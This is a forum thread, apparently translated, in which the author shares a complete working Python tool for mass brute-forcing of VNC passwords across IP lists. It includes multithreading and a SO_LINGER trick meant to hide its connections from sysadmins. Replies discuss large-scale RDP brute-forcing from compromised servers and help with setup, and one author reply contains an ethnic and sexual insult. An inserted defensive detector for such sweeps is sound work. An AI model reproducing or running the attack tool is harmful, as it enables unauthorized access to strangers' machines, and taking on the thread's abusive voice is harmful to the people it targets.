Elohim Posted February 24, 2014

Okay, let me start by explaining a problem that is common in most open-source pentesting programs. Very many of them, if not all, use blocking sockets. That means that if a connection is created to IP X, but for whatever reason that host refuses to respond, the connection stays open until a) the program exits or b) the system default timeout error is reached, which is usually HUGE. Hydra, medusa, ncrack, even nmap's vnc-brute.nse, all have the same problem. They were not designed badly; to some extent, when you test your own network, these problems don't happen. So we will use non-blocking sockets. That means that if a defined number of seconds passes and we receive no response, we close the connection. I set it to 25 seconds, but it can be changed in the source if needed.

```python
import socket, struct
from Crypto.Cipher import DES
from sys import exc_info, exit, version_info, maxint
import sys
import Queue, threading

bad = open('bad.txt','w')
valid = open('valid.txt','a')
err = open('error.txt','w')
cracked = []

try:
    with open('valid.txt','rU') as vf:
        valids = vf.read().splitlines()
        for val in valids:
            h1 = val.split(" ")[0]
            cracked.append(h1)
except:
    pass

queue = Queue.Queue(maxsize=4000)

with open('ips.txt','rU') as ipf:
    hosts = ipf.read().splitlines()
with open('pass.txt','rU') as pf:
    passwords = pf.read().splitlines()

ThreadNmber = int(sys.argv[1])
Verbose = str(sys.argv[2])

def gen_key(key):
    try:
        newkey = []
        for ki in range(len(key)):
            bsrc = ord(key[ki])
            btgt = 0
            for i in range(8):
                if bsrc & (1 << i):
                    btgt = btgt | (1 << 7-i)
            newkey.append(btgt)
        if version_info[0] == 2:
            return ''.join(chr(c) for c in newkey)
        else:
            return bytes(newkey)
    except:
        pass

class VNCBrute(threading.Thread):
    def __init__(self, queue):
        threading.Thread.__init__(self)
        self.queue = queue

    def run(self):
        while True:
            host,passwd = self.queue.get()
            self.checker(host,passwd)
            self.queue.task_done()

    def checker(self,host,password):
        try:
            if host in cracked:
                return False
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.setblocking(0)
            s.settimeout(25)
            s.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, struct.pack('ii', 1, 0))
            s.connect((host,5900))
            resp = s.recv(99)
            version = resp[:11].decode('ascii')
            if len(resp) > 12:
                s.close()
                return False
            major, minor = version[6], version[10]
            if (major, minor) in [('3', '8'), ('4', '1')]:
                proto = b'RFB 003.008\n'
            elif (major, minor) == ('3', '7'):
                proto = b'RFB 003.007\n'
            else:
                proto = b'RFB 003.003\n'
            s.sendall(proto)
            resp = s.recv(99)
            if minor in ('7', '8'):
                code = ord(resp[0:1])
                if code == 0:
                    s.close()
                    return False
                s.sendall(b'\x02')
                resp = s.recv(99)
            else:
                code = ord(resp[3:4])
                if code != 2:
                    s.close()
                    return False
            resp = resp[-16:]
            if len(resp) != 16:
                s.close()
                return False
            sys.stdout.write("\r[+]Trying "+host+' '+password+' ')
            sys.stdout.flush()
            pw = password.ljust(8, '\x00')[:8]
            key = gen_key(pw)
            des = DES.new(key, DES.MODE_ECB)
            enc = des.encrypt(resp)
            s.sendall(enc)
            resp = s.recv(99)
            code = ord(resp[3:4])
            mesg = resp[8:].decode('ascii', 'ignore')
            if code == 1:
                if Verbose == 'v':
                    bad.write(host+'\n')
                    bad.flush()
                s.close()
            elif code == 0:
                valid.write(host+' '+password+'\n')
                valid.flush()
                cracked.append(host)
                print '\rOWNED!!! '+' '+host+' '+password,' '
                s.close()
            else:
                s.close()
                return False
        except Exception, e:
            err.write(host+'\n')
            err.flush()
            pass

def main():
    try:
        i = 0
        for i in range(ThreadNmber):
            t = VNCBrute(queue)
            t.daemon = True
            t.start()
            i += 1
    except Exception, e:
        print 'Stopped at',i,'Threads'
        sys.exit()
    print i,'Threads spawned'
    for password in passwords:
        for host in hosts:
            queue.put((host,password))
    queue.join()

print '[+] VNC Brute Force Tool'
print '[+] Author: Elohim '
main()
```

There is one option that I find interesting. Let's say we don't want to make too much noise when we run the program from another server. If a sysadmin looks at the number of connections he will be horrified (or he may have an alarm that triggers when a certain number of outgoing connections is exceeded). So I used:

setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, struct.pack('ii', 1, 0))

This means that once we close the connection, instead of entering the TIME_WAIT state and sitting there for 120 s (the default on most systems), the socket closes abruptly and disappears from netstat. It also helps when there is a limit on the number of ephemeral ports in use (rare).

Usage:
python vnc.py 100 v/no

Where:
100 = the number of threads. Tested up to 1400 threads; it runs flawlessly if the internet speed allows it.
v/no = if you leave just v and use a single user and password, only the IPs that actually run VNC software and where authentication failed are written to bad.txt. Why is this useful? I discussed the issue a bit with a similar script for WordPress. In short, it filters out the IPs that have nothing to do with VNC but happen to have port 5900 open. If left as no, it does not do this filtering. It is only needed once; after that, reuse the IPs from bad.txt.

If you have questions, don't hesitate to ask. I'm fed up with seeing people sell scripts like this. I assure you there is nothing another program can offer beyond the one presented here. It covers absolutely all the requirements for speed and effectiveness. Don't waste your money on nonsense, buy milk for the kids =) Good luck!

P.S. If anyone wants to discuss the RFB part and the problem of VNC servers that also require a username, I look forward to debating it.
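Added example, taking the defender's side of the same observation; it is not part of the original post or of Elohim's tool. Because the tool aborts every socket with SO_LINGER {1, 0}, its connections skip TIME_WAIT and do not show up in netstat on the sending host, but a flow or conntrack log on the network still records one source opening RST-terminated flows to tcp/5900 against many destinations in a short window. The script below flags that pattern. The record shape, addresses, thresholds and function names are assumptions, and the log lines are constructed.

```python
# Added example, not part of the original post or of the tool above.
# Defender's view: the tool closes every socket with SO_LINGER {1, 0},
# so connections skip TIME_WAIT and vanish from netstat, but a flow or
# conntrack log still records one source opening RST-terminated flows
# to tcp/5900 on many destinations in a short window.  This detector
# flags that pattern.  Log shape, addresses and thresholds are assumed.
from collections import defaultdict
from datetime import datetime, timedelta

TIME_FMT = "%Y-%m-%dT%H:%M:%S"


def constructed_sample():
    """Build constructed flow records (not real traffic) in the assumed shape:
    '<ISO timestamp> <src_ip> <dst_ip> <dst_port> <close:FIN|RST|TIMEOUT>'."""
    base = datetime(2014, 2, 24, 12, 0, 0)
    lines = []
    # One source reaching 30 distinct hosts on 5900 within 30 s, every flow aborted (RST).
    for i in range(30):
        ts = (base + timedelta(seconds=i)).strftime(TIME_FMT)
        lines.append("%s 10.0.0.5 192.0.2.%d 5900 RST" % (ts, i + 1))
    # A legitimate admin: two VNC sessions, 15 minutes apart, closed normally.
    lines.append("%s 10.0.0.9 192.0.2.40 5900 FIN" % (base + timedelta(seconds=5)).strftime(TIME_FMT))
    lines.append("%s 10.0.0.9 192.0.2.41 5900 FIN" % (base + timedelta(seconds=900)).strftime(TIME_FMT))
    # Unrelated SSH traffic from the same noisy source; must not count toward 5900.
    lines.append("%s 10.0.0.5 192.0.2.50 22 FIN" % (base + timedelta(seconds=3)).strftime(TIME_FMT))
    return "\n".join(lines)


def parse_flows(text):
    """Parse the assumed record shape into (timestamp, src, dst, dport, close) tuples."""
    flows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, dport, close = line.split()
        flows.append((datetime.strptime(ts, TIME_FMT), src, dst, int(dport), close))
    return flows


def detect_sweeps(flows, port=5900, window=timedelta(seconds=60),
                  min_targets=20, min_rst_ratio=0.8):
    """Return one alert per source that reached at least `min_targets` distinct
    hosts on `port` inside any `window`, with at least `min_rst_ratio` of those
    flows aborted (RST) rather than closed cleanly (FIN)."""
    by_src = defaultdict(list)
    for ts, src, dst, dport, close in flows:
        if dport == port:
            by_src[src].append((ts, dst, close))

    alerts = []
    for src, events in by_src.items():
        events.sort()
        best = None
        left = 0
        for right in range(len(events)):
            # Slide the left edge so the span never exceeds the window.
            while events[right][0] - events[left][0] > window:
                left += 1
            span = events[left:right + 1]
            targets = set(dst for _, dst, _ in span)
            if len(targets) < min_targets:
                continue
            rst_ratio = sum(1 for _, _, c in span if c == "RST") / float(len(span))
            if rst_ratio >= min_rst_ratio and (best is None or len(targets) > best["distinct_targets"]):
                best = {
                    "src": src,
                    "distinct_targets": len(targets),
                    "rst_ratio": round(rst_ratio, 2),
                    "first_seen": span[0][0].strftime(TIME_FMT),
                }
        if best is not None:
            alerts.append(best)
    return alerts


if __name__ == "__main__":
    for alert in detect_sweeps(parse_flows(constructed_sample())):
        print("sweep from %(src)s: %(distinct_targets)d hosts on tcp/5900, "
              "RST ratio %(rst_ratio).2f, first seen %(first_seen)s" % alert)
```

The point of the example is that the SO_LINGER trick only hides the socket from the sending host's own netstat. A flow record, a perimeter firewall log or the VNC server's own failed-authentication log on the receiving side is unaffected, and a burst of RST-terminated flows from one source to many destinations on the same port is exactly the signature to alert on; the thresholds here are starting values to tune against your own baseline.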
fit. Posted March 5, 2014

Thanks!!

poppers13 Posted March 6, 2014 (edited)

It doesn't work, at least not for me... Edited March 6, 2014 by poppers13

floris2003 Posted March 6, 2014

@poppers13 Exactly the same thing happens to me. Could it be the Python version?

Elohim (Author) Posted March 6, 2014 (edited)

Fix your indentation, guys. It says in black and white "Inconsistent use of tabs and spaces". Or look for an indent fixer for Python. @poppers13, it's either v or no, not v/no lol. Edited March 6, 2014 by Elohim
NOVATu Posted March 8, 2014

Any idea? @fallen_angel told me to replace it with this:

' '.join(('\rOWNED', host, password, 80*' '))

but it gives me another error further down:

Syntax Error: except Exception, e:: C:\Python33\vnc.py, line 125, pos 33

Elohim (Author) Posted March 8, 2014 (edited)

@NOVATu, remove Python 3.3 and install 2.7. I think I should have specified that in the OP, my bad. **mi-a, sa-l, imi Edited March 8, 2014 by Elohim
stroici Posted May 14, 2014

I know it may seem a dumb question, but does it work if you replace 5900 with 3389?

sebywarlord Posted May 14, 2014

@stroici You want to brute-force RDP servers through the VNC protocol? If you want RDP brute force, use hydra/ncrack/medusa.

stroici Posted May 14, 2014

Yep, I was sure the protocol was the catch. I've tried all three. As they come by default they're rubbish... at least for the RDP part. And I put a decent passfile on a hundred thousand IPs, left it for a few days, on several roots. So, nothing. Ncrack, at least, already seems to hang after a day. Plus they're all hard to set up, they need gcc and have lots of files. Lousy portability...

sebywarlord Posted May 14, 2014

I'm happy with ncrack, but I don't give it a list of IPs because it runs slow as hell; I give it one IP at a time and a C script launches them from a list, 30 sessions at once. It works well, catches well, whatever.
Kulls Posted June 3, 2014

On this forum, wouldn't there happen to be any French speakers? No, just because with all the members posting messages, let's say I don't understand what they're saying. I see a bit of English in the few messages I've been able to read and the rest I don't understand! Sorry! :s

Elohim (Author) Posted June 3, 2014

> On this forum, wouldn't there happen to be any French speakers? No, just because with all the members posting messages, let's say I don't understand what they're saying. I see a bit of English in the few messages I've been able to read and the rest I don't understand! Sorry! :s

Romanians fuck the French in the ass. Go back into your mother's vagina.

Rikudo Posted June 3, 2014

> Romanians fuck the French in the ass. Go back into your mother's vagina.

Oof oof.
StereoONLINE Posted July 9, 2014

Where can I get the crypto.cipher module for 2.7?

Ganav Posted July 9, 2014 (edited)

> Where can I get the crypto.cipher module for 2.7?

On Ubuntu you can run:

sudo apt-get install python-crypto

On CentOS (>= 6.6):

sudo yum install python-crypto

First check that you have the following dependencies resolved: Ubuntu – Details of package python-crypto in precise. Edited February 17, 2015 by Ganav

Elohim (Author) Posted July 9, 2014

If you get errors like that, you're better off installing Python 2.7 than starting to patch it up.
Chameleon. Posted July 22, 2014

interesting...

alexandruth Posted July 22, 2014

> interesting...

Man, don't you know how to farm more posts?

TheOne Posted July 22, 2014

> Man, don't you know how to farm more posts?

He needed 10 posts to make a REQUEST :)

zeroabsolut Posted November 22, 2015

Can someone help me with setting it up? I can't get it working.